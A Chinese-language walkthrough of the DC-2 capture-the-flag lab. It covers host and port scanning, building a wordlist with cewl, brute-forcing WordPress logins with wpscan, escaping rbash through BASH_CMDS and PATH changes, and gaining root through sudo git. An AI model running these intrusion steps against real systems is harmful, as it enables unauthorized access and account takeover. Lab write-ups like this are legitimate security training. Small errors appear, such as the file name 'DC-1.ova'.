DC 靶场系列
DC2,冲冲冲
# 一、环境搭建
# 准备工具
kali
DC-2 靶机
# 靶机下载地址
- DC-2.zip (Size: 847 MB)
- Download: http://www.five86.com/downloads/DC-2.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip
# 安装过程
解压得到 DC-1.ova 文件
用 vmware 虚拟机打开此文件
如提示导入失败,点击重试即可
kali 和靶机得网络连接模式都改为 NAT 模式,不然 kali 扫不出靶机的 ip
# 二、渗透过程
攻击机 (kali) ip:192.168.112.130
靶机 (DC-2) ip:192.168.112.131
# 信息收集
# 探测目标 ip
arp-scan
arp-scan -l |
探测出靶机 ip
# 探测目标端口
利用 nmap 扫描靶机端口
nmap -sV -p- 192.168.112.131 |
扫出了两个端口 80 7744 ,其中 7744 是 ssh 端口
# 爆破账号密码
因为 80 是 http 协议,所以用浏览器打开
可以很明显的看到这一次的靶场是 Wordpress cms
当前界面还有 Flag
看到个 cewl ,此工具是生成字典用的,说明提示让我们扒一下字典
Cewl 使用
cewl http://dc-2 > passwd.txt |
并且我们知道此靶机是 Wordpress cms
就可以利用 kali 的 wpscan 专门用来扫 Wordpress
WPScan 的使用
枚举用户名
wpscan --url http://dc-2/ -e u |
可以看到枚举了三个用户名,我们将他添加进文本里面
这下账号密码字典都准备就绪
利用 wpscan 爆破出账号密码
wpscan --url http://dc-2/ --usernames user.txt --passwords passwd.txt |
这下账号密码都有了,去查查后台目录在哪
# 扫描目录
dirsearch
dirsearch -u "url" |
dirb
dirb url |
这里以 dirsearch 为例
# 登陆
扫出了很多文件,包括我们正要找的 login
将我们刚才爆破出来的账号密码输入进去登陆到后台
在 /page 这里找到了 Flag2
这里提示我们找其他的方式进入,想来想去,之前我们不是还扫出了 ssh 端口吗
利用爆破出来的账号登陆试试
ssh jerry@192.168.112.131 -p 7744 |
打了三遍密码,还以为是我打错了
结果一试 tom 就成功了....
ssh tom@192.168.112.131 -p 7744 |
进入后 ls 发现 flag3 ,可是 rbash 限制了我们的权限不能用 cat
shell 命令行自动补全
compgen -c |
查看能使用哪些指令
看到 vi 可以用,打开文件试试
这里的大致意思就是要我们切换 jerry 用户
但 tom 使用的权限很有限,无法切换 jerry 用户
这里我们通过对写入环境变量对 rbash 进行绕过
BASH_CMDS[a]=/bin/sh;a # 调用 /bin/sh 命令解释器 | |
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin # 设置环境变量 |
此时命令基本上都可以使用了
此时我们切换 jerry 的账号
su jerry |
找到第四个 Flag4
提示我们利用 git 来提权
# 提权
我们查看一下有 root 权限的指令
只有 git
git 提权方法
sudo git -p --help |
这里我们将 : 变成 ! 然后输入 shell,这里我们将 root 的密码更改掉
这样就更改成功了
随后切换到 root 用户 在 /root 下找到最终的 Flag
至此本章结束
